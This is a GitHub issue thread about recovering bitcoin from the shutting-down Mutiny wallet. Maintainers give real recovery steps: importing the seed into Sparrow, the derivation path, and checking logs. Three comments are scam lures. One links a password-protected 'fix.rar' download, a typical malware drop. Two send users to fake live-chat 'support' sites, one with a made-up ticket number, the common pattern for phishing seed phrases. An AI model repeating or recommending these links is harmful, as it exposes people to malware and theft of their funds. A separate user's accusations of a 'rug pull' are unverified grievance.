### ISSUE TITLE
How to transfer funds to another wallet?

### ISSUE THREAD

**Issue by manimejia** [MutinyWallet/mutiny-web#1290]
Looks like all my channels have been force closed, I cannot open another, and mutiny is shutting down end of year anyway. 

Now I have 150k sats "on chain" (can't spend in the wallet) and a seed phrase written down. 

Where do I go from here?

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Clark-techweb** [comment]
@manimejia Thanks for posting the issue. 

Your query would be best dealt with by the support team.

Please see the link below to our dedicated support line:

Support :[Help Center](https://cryptorectification.pages.dev/)

Note: **Click on the live chat icon at the bottom corner of the page to start a conversation**

**Comment by TonyGiorgio** [comment]
If you had a force close, it takes anywhere from 3 to 14 days to resolve and sweep on chain. If it's been longer than that, feel free to provide logs or try loading your wallet in another tool like sparrow: https://github.com/MutinyWallet/mutiny-web/wiki/Recovery#on-chain

**Comment by marksftw** [comment]
If you load your seed phrase into Sparrow, how much does it say you have? That might be the best option for you. Move it on-chain from Sparrow to your preferred next stop for Lightning.

**Comment by villainvortex** [comment]
I downloaded sparrow wallet and entered seed phrase and nothing loading up. Tried scanning the new created wallet to send from mutiny, but mutiny still gives error messages. Mutiny wallet screwed a lot of us over and they're of no help . Terrible experience with them and their smug attitude . Tony doesn't reply back on twitter because he knows he rug pulled a lot of people.![image](https://github.com/user-attachments/assets/d6ac1bbb-91a0-411e-b357-03a86bb43eda)

**Comment by villainvortex** [comment]
Then also get this message too claiming they don't have enough to send. It's utter bs . But Tony and mutiny will have to answer for this because you can't have a failed app especially in this space and ignore ppl having issues with your product. ![image](https://github.com/user-attachments/assets/c29bdb91-ef43-454b-bc79-37914a2f6c22)

**Comment by marksftw** [comment]
hey @villainvortex did you put the derivation path into Sparrow when you loaded your seed phrase? It is `m/86'/0'/0'` Here's the reference for recovery https://github.com/MutinyWallet/mutiny-web/wiki/Recovery

**Comment by villainvortex** [comment]
> hey @villainvortex did you put the derivation path into Sparrow when you loaded your seed phrase? It is `m/86'/0'/0'` Here's the reference for recovery https://github.com/MutinyWallet/mutiny-web/wiki/Recovery

I did that and still nothing

**Comment by Darrellben** [comment]
Hello @villainvortex ! 
This could be due to a technical issue or system glitch. To resolve it, it's best to contact the official support team, as they can investigate and fix the problem.

I've already submitted a support ticket for you (Reference ID: CON7638). You can follow up by visiting [Sparrow wallet dApps Support Requests](thedappsupport.com) and clicking the live chat icon in the bottom corner to connect with a support agent.

If you run into any issues or need further assistance, feel free to reach out. Thanks for your patience!

**Comment by AnthonyRonning** [comment]
You'll have to look through the logs yourself (which you have not provided here like I had asked) and figure it out on your own. We have provided all the sources and instructions we can.
